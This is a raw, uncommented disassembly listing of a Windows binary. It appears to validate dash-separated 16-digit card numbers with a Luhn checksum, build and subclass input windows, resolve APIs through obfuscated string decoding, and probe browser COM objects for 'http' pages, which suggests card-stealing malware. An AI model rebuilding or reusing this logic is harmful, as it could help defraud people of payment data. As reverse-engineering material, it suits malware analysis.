cmp byte ptr [ecx+eax], 0
jnz short loc_41C25D
mov [ebp+var_128], eax
mov edx, ds:100140D8h
add edx, 0Bh
cmp eax, edx
jz short loc_41C288
mov edx, ds:10014198h
add edx, 0Ah
cmp eax, edx
jnz loc_41D23C
loc_41C288: ; CODE XREF: sub_41C22E+47�j
mov ebx, ds:100141FCh
sub ebx, 4
jmp short loc_41C2B7
; ---------------------------------------------------------------------------
loc_41C293: ; CODE XREF: sub_41C22E+9C�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:10011540h[edx], eax
jz loc_41D23C
inc ebx
loc_41C2B7: ; CODE XREF: sub_41C22E+63�j
mov eax, ds:10014138h
add eax, 5Eh
movsx edx, word ptr ds:100140A0h
add eax, edx
cmp ebx, eax
jb short loc_41C293
mov eax, ds:10014218h
add eax, 0Ah
cmp [ebp+var_128], eax
jnz loc_41C4AF
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_41C2F2
cmp al, 20h
jnz loc_41D23C
loc_41C2F2: ; CODE XREF: sub_41C22E+BA�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_41C304
cmp al, 20h
jnz loc_41D23C
loc_41C304: ; CODE XREF: sub_41C22E+CC�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_41C316
cmp al, 20h
jnz loc_41D23C
loc_41C316: ; CODE XREF: sub_41C22E+DE�j
mov eax, ds:100141B4h
add eax, ds:10014248h
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_103], dl
mov eax, ds:10014168h
add eax, ds:100140ECh
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov [ebp+eax+var_10D], dl
movsx eax, word ptr ds:100141B8h
add eax, ds:10014100h
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_109], dl
movsx eax, word ptr ds:10014148h
mov edx, ds:100141A0h
lea eax, [eax+edx+3]
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_FF], dl
mov eax, ds:100141BCh
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FE], dl
movsx eax, word ptr ds:100141C0h
movsx edx, word ptr ds:10014180h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov byte ptr [ebp+eax+var_108], dl
movsx eax, word ptr ds:10014114h
add eax, ds:100141ECh
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov byte ptr [ebp+eax+var_108], dl
mov eax, ds:10014200h
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_FE], dl
mov eax, ds:100140D0h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_F8], dl
mov eax, ds:100141B0h
add eax, ds:1001419Ch
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov byte ptr [ebp+eax+var_108+2], dl
mov eax, ds:100140F0h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_F5], dl
mov eax, ds:10014170h
add eax, 3
add eax, ds:100141BCh
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:100140F4h
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FA], dl
mov eax, ds:100140ACh
add eax, 3
add eax, ds:10014170h
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_FF], dl
mov eax, ds:100141ACh
movsx edx, word ptr ds:10014114h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:100140B4h
movsx edx, word ptr ds:10014160h
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, ds:10014178h
mov edx, ds:100141D8h
sub edx, 3
mov [ebp+eax+var_F4], dl
jmp short loc_41C4BE
; ---------------------------------------------------------------------------
loc_41C4AF: ; CODE XREF: sub_41C22E+AC�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_425D7D
loc_41C4BE: ; CODE XREF: sub_41C22E+27F�j
mov esi, ds:100141CCh
dec esi
jmp short loc_41C4DC
; ---------------------------------------------------------------------------
loc_41C4C7: ; CODE XREF: sub_41C22E+2C1�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_41C4D6
cmp al, 39h
jle short loc_41C4DB
loc_41C4D6: ; CODE XREF: sub_41C22E+2A2�j
jmp loc_41D23C
; ---------------------------------------------------------------------------
loc_41C4DB: ; CODE XREF: sub_41C22E+2A6�j
inc esi
loc_41C4DC: ; CODE XREF: sub_41C22E+297�j
movsx eax, word ptr ds:10014128h
mov edx, ds:10014178h
lea eax, [eax+edx+6]
cmp esi, eax
jb short loc_41C4C7
movsx eax, word ptr ds:100140F8h
movsx edx, word ptr ds:100140B8h
add eax, edx
sub eax, 0Ah
mov [ebp+var_108], eax
mov eax, ds:100140FCh
movsx edx, word ptr ds:10014190h
mov esi, eax
add esi, edx
sub esi, 0Ch
jmp short loc_41C560
; ---------------------------------------------------------------------------
loc_41C51F: ; CODE XREF: sub_41C22E+342�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word ptr ds:100140F8h
inc edx
imul eax, edx
add [ebp+var_108], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_41C556
mov eax, ds:10014238h
add eax, ds:100140DCh
sub [ebp+var_108], eax
loc_41C556: ; CODE XREF: sub_41C22E+315�j
mov eax, ds:100141B4h
sub eax, 2
add esi, eax
loc_41C560: ; CODE XREF: sub_41C22E+2EF�j
mov eax, ds:100141B0h
movsx edx, word ptr ds:100140C4h
add eax, edx
cmp esi, eax
jb short loc_41C51F
movsx eax, word ptr ds:100141C0h
mov ebx, eax
add ebx, ds:10014188h
sub ebx, 11h
jmp short loc_41C5A7
; ---------------------------------------------------------------------------
loc_41C586: ; CODE XREF: sub_41C22E+385�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp+var_108], eax
mov eax, ds:10014198h
add eax, ds:10014170h
sub eax, 0Ch
add ebx, eax
loc_41C5A7: ; CODE XREF: sub_41C22E+356�j
movsx eax, word ptr ds:10014114h
add eax, 7
cmp ebx, eax
jb short loc_41C586
mov eax, [ebp+var_108]
mov ecx, 0Ah
xor edx, edx
div ecx
mov edi, ds:100141F4h
add edi, ds:10014100h
sub edi, 0Ah
cmp edx, edi
jnz loc_41D23C
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:10013954h
pop ecx
or eax, eax
jnz loc_41D23C
movsx esi, word ptr ds:10014220h
sub esi, 7
movsx esi, word ptr ds:100140C4h
sub esi, 9
jmp short loc_41C61F
; ---------------------------------------------------------------------------
loc_41C607: ; CODE XREF: sub_41C22E+401�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp dword ptr ds:10011540h[eax], 0
jz short loc_41C631
inc esi
loc_41C61F: ; CODE XREF: sub_41C22E+3D7�j
mov eax, ds:10014118h
add eax, 5Ah
add eax, ds:10014104h
cmp esi, eax
jb short loc_41C607
loc_41C631: ; CODE XREF: sub_41C22E+3EE�j
mov eax, ds:10014188h
add eax, 5Bh
cmp esi, eax
jz loc_41D23C
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:10011540h[edx], eax
push 100156B1h
call sub_41B08F
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call dword ptr ds:10013814h
mov [ebp+var_134], eax
test eax, eax
jnz short loc_41C68A
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_41C68A: ; CODE XREF: sub_41C22E+451�j
push 100156A4h
call sub_41B08F
push eax
push [ebp+var_134]
call sub_41BF88
mov [ebp+var_12C], eax
push 10015698h
call sub_41B08F
push eax
push [ebp+var_12C]
call sub_41BF88
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:10011544h[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push dword ptr ds:10011544h[eax]
call dword ptr ds:10013838h
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call dword ptr ds:10013830h
push 0
call dword ptr ds:10010598h
mov [ebp-10Ch], eax
push 1001568Eh
call sub_41B08F
add esp, 1Ch
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_12C]
mov edi, [ebp-110h]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, ds:100141ACh
add edi, ds:100140A4h
sub edi, 0Eh
push edi
mov edi, ds:100141D8h
sub edi, 3
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:10011548h[ebx], edi
mov edi, ds:100141B0h
mov ebx, [ebp-110h]
sub ebx, [ebp+var_118]
mov edx, ds:10014218h
lea edi, [edi+edx+0EAh]
sub ebx, edi
mov edi, ds:100141B0h
add edi, 35h
mov eax, ebx
sub eax, edi
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov edx, ds:1001424Ch
sub edx, 9
cmp eax, edx
jge short loc_41C7F3
mov eax, ds:100141CCh
movsx edx, word ptr ds:100140F8h
add eax, edx
dec eax
mov [ebp+var_124], eax
loc_41C7F3: ; CODE XREF: sub_41C22E+5AE�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
mov edx, ds:10014104h
add edx, 29h
sub eax, edx
mov [ebp+var_120], eax
push 10015684h
call sub_41B08F
mov [ebp+var_278], eax
push 1001566Bh
call sub_41B08F
mov [ebp+var_27C], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push dword ptr ds:10011548h[edi]
movsx edi, word ptr ds:100140B4h
add edi, 38h
push edi
push [ebp+var_120]
push [ebp+var_124]
mov edi, ds:100140A8h
add edi, 10h
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, ds:10014184h
add edi, ds:100140C8h
sub edi, 3
push edi
call dword ptr ds:10012820h
mov [ebp+var_138], eax
push 10015661h
call sub_41B08F
mov [ebp+var_284], eax
push 1001565Dh
call sub_41B08F
mov [ebp+var_288], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push dword ptr ds:10011548h[edi]
mov edi, ds:100140B0h
add edi, 0F1h
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
movsx ebx, word ptr ds:10014190h
mov edx, ds:10014100h
lea ebx, [ebx+edx+30h]
add edi, ebx
mov ebx, ds:10014170h
movsx edx, word ptr ds:10014180h
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, ds:1001415Ch
add edi, 0Eh
add edi, ds:100141ECh
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, ds:100141A8h
add edi, ds:100140F0h
sub edi, 8
push edi
call dword ptr ds:10012820h
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:10014238h
sub eax, 9
push eax
movsx eax, word ptr ds:10014160h
sub eax, 6
push eax
movsx eax, word ptr ds:10014130h
sub eax, 2
push eax
push 2BCh
mov eax, ds:100141FCh
sub eax, 4
push eax
mov eax, ds:10014200h
add eax, ds:100140E0h
sub eax, 8
push eax
push dword ptr ds:10014158h
mov eax, ds:100141C4h
add eax, 13h
push eax
call dword ptr ds:10011214h
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call dword ptr ds:1000D014h
push 10015653h
call sub_41B08F
mov [ebp+var_290], eax
push 1001564Eh
call sub_41B08F
add esp, 18h
push 0
push dword ptr [ebp-10Ch]
push 0
push [ebp+var_13C]
mov edi, ds:100140B0h
mov ebx, ds:10014178h
add ebx, 0F4h
add ebx, ds:100141A4h
mov edx, edi
add edx, ds:1001424Ch
sub edx, 0Eh
sub ebx, edx
push ebx
mov ebx, [ebp+var_120]
mov edx, ds:100141F8h
add edx, edi
mov edi, edx
sub edi, 0Bh
sub ebx, edi
push ebx
movsx edi, word ptr ds:1001421Ch
add edi, ds:100140ACh
sub edi, 0Ah
push edi
mov edi, ds:100140A4h
add edi, ds:100140FCh
sub edi, 0Fh
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, ds:100140D8h
movsx ebx, word ptr ds:10014210h
add edi, ebx
sub edi, 0Bh
push edi
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:1001154Ch[ebx], edi
mov eax, ds:10014178h
cmp [ebp+eax+var_104], 34h
jnz short loc_41CAC5
push 10015646h
call sub_41B08F
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_425D7D
jmp short loc_41CADD
; ---------------------------------------------------------------------------
loc_41CAC5: ; CODE XREF: sub_41C22E+87B�j
push 10015638h
call sub_41B08F
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_425D7D
loc_41CADD: ; CODE XREF: sub_41C22E+895�j
push 100155C6h
call sub_41B08F
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call dword ptr ds:10013810h
push 100155BCh
call sub_41B08F
mov [ebp+var_298], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
movsx edi, word ptr ds:10014144h
add edi, 27h
push edi
push [ebp+var_120]
mov edi, ds:10014218h
inc edi
push edi
mov edi, ds:10014158h
add edi, 2
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, ds:10014168h
add edi, ds:1001410Ch
sub edi, 9
push edi
call dword ptr ds:10012820h
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
movsx eax, word ptr ds:10014120h
add eax, ds:100140D8h
sub eax, 0Eh
push eax
mov eax, ds:100140CCh
mov edx, ds:100141CCh
add edx, eax
sub edx, 7
push edx
movsx edx, word ptr ds:100140A0h
add edx, eax
mov eax, edx
sub eax, 7
push eax
push 190h
mov eax, ds:100141ACh
add eax, ds:1001415Ch
sub eax, 5
push eax
mov eax, ds:10014140h
add eax, ds:1001410Ch
sub eax, 9
push eax
movsx eax, word ptr ds:100140B8h
sub eax, 3
push eax
movsx eax, word ptr ds:10014110h
add eax, 10h
push eax
call dword ptr ds:10011214h
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call dword ptr ds:1000D014h
push 100155B0h
call sub_41B08F
mov [ebp+var_2A0], eax
push 100155ACh
call sub_41B08F
mov [ebp+var_2A4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
mov edi, ds:10014198h
add edi, 11Ah
add edi, ds:10014188h
push edi
movsx edi, word ptr ds:10014180h
add edi, 2Dh
push edi
movsx edi, word ptr ds:10014128h
add edi, 46h
push edi
movsx edi, word ptr ds:10014190h
add edi, 5
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, ds:100140A4h
sub edi, 9
push edi
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:10011550h[ebx], edi
push 100155A0h
call sub_41B08F
mov [ebp+var_2B0], eax
push 1001559Ch
call sub_41B08F
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
mov edi, ds:10014248h
add edi, 12Ch
push edi
movsx edi, word ptr ds:10014220h
mov ebx, ds:1001415Ch
lea edi, [edi+ebx+35h]
push edi
movsx edi, word ptr ds:10014110h
mov ebx, edi
add ebx, 4Bh
push ebx
mov ebx, ds:1001416Ch
add ebx, 3Fh
add ebx, ds:100140ACh
push ebx
push 50800003h
mov ebx, [ebp+var_2B4]
push ebx
mov ebx, [ebp+var_2B0]
push ebx
add edi, ds:10014178h
sub edi, 5
push edi
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:10011554h[ebx], edi
mov eax, ds:10014104h
sub eax, 3
mov [ebp+var_102], ax
jmp loc_41CE51
; ---------------------------------------------------------------------------
loc_41CD95: ; CODE XREF: sub_41C22E+C3D�j
push 10015594h
call sub_41B08F
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10013810h
lea eax, [ebp+var_2C6]
push eax
mov eax, ds:100141ACh
sub eax, 5
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:1000D014h
push 1001558Ah
call sub_41B08F
movzx edi, [ebp+var_102]
mov ebx, ds:10014238h
sub ebx, 3
add edi, ebx
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10013810h
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
mov eax, ds:100141BCh
movsx edx, word ptr ds:10014114h
add eax, edx
sub eax, 0Ch
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:1000D014h
inc [ebp+var_102]
loc_41CE51: ; CODE XREF: sub_41C22E+B62�j
movzx eax, [ebp+var_102]
movsx edx, word ptr ds:10014130h
mov ecx, ds:10014200h
lea edx, [edx+ecx+5]
cmp eax, edx
jl loc_41CD95
push 10015582h
call sub_41B08F
mov [ebp+var_2C0], eax
push 1001557Eh
call sub_41B08F
mov [ebp+var_2C4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
movsx edi, word ptr ds:10014114h
add edi, 0Fh
push edi
mov edi, ds:100141E4h
add edi, 54h
push edi
movsx edi, word ptr ds:100140B4h
mov ebx, ds:100140F0h
lea edi, [edi+ebx+78h]
push edi
mov edi, ds:100140C8h
add edi, 2Dh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:10011558h[ebx], edi
movsx eax, word ptr ds:10014194h
movsx edx, word ptr ds:100140E8h
add eax, edx
sub eax, 0Dh
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:1000D014h
push 10015574h
call sub_41B08F
mov [ebp+var_2D4], eax
push 10015552h
call sub_41B08F
mov [ebp+var_2D8], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
mov edi, ds:1001417Ch
add edi, 36h
add edi, ds:100141E0h
push edi
push [ebp+var_120]
mov edi, ds:100140CCh
add edi, 49h
push edi
mov edi, ds:1001409Ch
add edi, 95h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
mov edi, ds:100141A8h
sub edi, 8
push edi
call dword ptr ds:10012820h
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call dword ptr ds:1000D014h
push 10015548h
call sub_41B08F
mov [ebp+var_2E0], eax
push 1001552Eh
call sub_41B08F
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push dword ptr [ebp-10Ch]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push dword ptr ds:1001154Ch[edi]
movsx edi, word ptr ds:10014220h
add edi, 10h
push edi
mov edi, ds:100141D8h
add edi, 94h
movsx ebx, word ptr ds:100140B4h
add edi, ebx
push edi
mov edi, ds:100141B4h
add edi, 0F6h
mov ebx, ds:1001414Ch
add ebx, 1Bh
sub edi, ebx
push edi
movsx edi, word ptr ds:10014114h
inc edi
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
movsx edi, word ptr ds:10014120h
movsx ebx, word ptr ds:100141B8h
add edi, ebx
sub edi, 0Eh
push edi
call dword ptr ds:10012820h
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:1001155Ch[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push dword ptr ds:1001155Ch[eax]
call dword ptr ds:1000D014h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:100137FCh
mov edi, [ebp+var_2F8]
mov ds:10011560h[edi], eax
push 100048EAh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:100105ACh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:100137FCh
mov edi, [ebp+var_304]
mov ds:10011564h[edi], eax
push 100048EAh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push dword ptr ds:10011554h[eax]
call dword ptr ds:100105ACh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:100137FCh
mov edi, [ebp+var_310]
mov ds:10011568h[edi], eax
push 100048EAh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push dword ptr ds:10011558h[eax]
call dword ptr ds:100105ACh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push dword ptr ds:1001154Ch[eax]
call dword ptr ds:100137FCh
mov edi, [ebp+var_31C]
mov ds:1001156Ch[edi], eax
push 100048EAh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push dword ptr ds:1001154Ch[eax]
call dword ptr ds:100105ACh
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push dword ptr ds:10011550h[eax]
call dword ptr ds:100109FCh
loc_41D23C: ; CODE XREF: sub_41C22E+10�j
; sub_41C22E+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C22E endp
; =============== S U B R O U T I N E =======================================
sub_41D241 proc near ; CODE XREF: .data:0041A7C7�p
push edi
push 1001551Eh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10010598h
mov ds:10014268h, eax
test eax, eax
jnz short loc_41D274
push 1001550Eh
call sub_41B08F
pop ecx
push eax
call dword ptr ds:10011208h
mov ds:10014268h, eax
loc_41D274: ; CODE XREF: sub_41D241+1A�j
push 100154FCh
call sub_41B08F
push eax
push dword ptr ds:10014268h
call dword ptr ds:100101ACh
mov ds:1000DFF8h, eax
push 100154EBh
call sub_41B08F
push eax
push dword ptr ds:10014268h
call dword ptr ds:100101ACh
mov ds:10013D84h, eax
push 100154DBh
call sub_41B08F
push eax
push dword ptr ds:10014268h
call dword ptr ds:100101ACh
mov ds:10013D94h, eax
push 100154CCh
call sub_41B08F
push eax
push dword ptr ds:10014268h
call dword ptr ds:100101ACh
mov ds:1000D040h, eax
push 100154BCh
call sub_41B08F
add esp, 14h
push eax
push dword ptr ds:10014268h
call dword ptr ds:100101ACh
mov ds:10011218h, eax
pop edi
retn
sub_41D241 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D305 proc near ; CODE XREF: .data:0041BB37�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_425D5D
push ebx
push esi
push edi
cmp dword ptr ds:1001433Ch, 0
jnz short loc_41D332
mov eax, ds:100140F0h
add eax, 0Ah
cmp ds:100105D0h, eax
jb loc_41D574
loc_41D332: ; CODE XREF: sub_41D305+17�j
lea eax, [ebp+var_10020]
push eax
call dword ptr ds:1000D040h
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
movsx eax, word ptr ds:100141F0h
add eax, ds:100140C0h
sub eax, 6
push eax
push [ebp+arg_0]
call dword ptr ds:10011218h
mov edi, eax
mov eax, ds:100141E8h
add eax, ds:100141A4h
sub eax, 8
cmp edi, eax
jnz loc_41D574
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push 10015CD4h
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, ds:100141E8h
sub eax, 7
cmp edi, eax
jnz loc_41D574
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, ds:10014218h
movsx edx, word ptr ds:1001411Ch
add eax, edx
sub eax, 0Dh
cmp edi, eax
jnz loc_41D56E
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_41BCA3
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call dword ptr ds:10013D84h
cmp [ebp+var_10003], 68h
jnz short loc_41D432
cmp [ebp+var_10002], 74h
jnz short loc_41D432
cmp [ebp+var_10001], 74h
jnz short loc_41D432
cmp [ebp+var_10000], 70h
jz short loc_41D437
loc_41D432: ; CODE XREF: sub_41D305+110�j
; sub_41D305+119�j ...
jmp loc_41D56E
; ---------------------------------------------------------------------------
loc_41D437: ; CODE XREF: sub_41D305+12B�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, ds:1001422Ch
add eax, ds:1001418Ch
sub eax, 5
cmp edi, eax
jnz loc_41D56E
lea eax, [ebp+var_4]
push eax
push 10015C44h
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, ds:100141F8h
sub eax, 6
cmp edi, eax
jnz loc_41D562
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, ds:10014150h
sub eax, 2
cmp edi, eax
jnz loc_41D559
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, ds:1001416Ch
sub eax, 2
cmp edi, eax
jz short loc_41D4E1
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_41D559
; ---------------------------------------------------------------------------
loc_41D4E1: ; CODE XREF: sub_41D305+1CC�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_41D4F4
xor ebx, ebx
inc ebx
loc_41D4F4: ; CODE XREF: sub_41D305+1EA�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_41D559
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
movsx eax, word ptr ds:10014220h
movsx edx, word ptr ds:10014128h
add eax, edx
sub eax, 0Ch
cmp edi, eax
jnz short loc_41D559
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_1
push [ebp+var_1002C]
push [ebp+var_4]
push esi
call sub_4229B3
add esp, 14h
loc_41D559: ; CODE XREF: sub_41D305+1A7�j
; sub_41D305+1DA�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41D562: ; CODE XREF: sub_41D305+182�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41D56E: ; CODE XREF: sub_41D305+D9�j
; sub_41D305:loc_41D432�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_41D574: ; CODE XREF: sub_41D305+27�j
; sub_41D305+76�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41D305 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D579 proc near ; CODE XREF: sub_41B78D+56�p
; .data:0041BD33�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
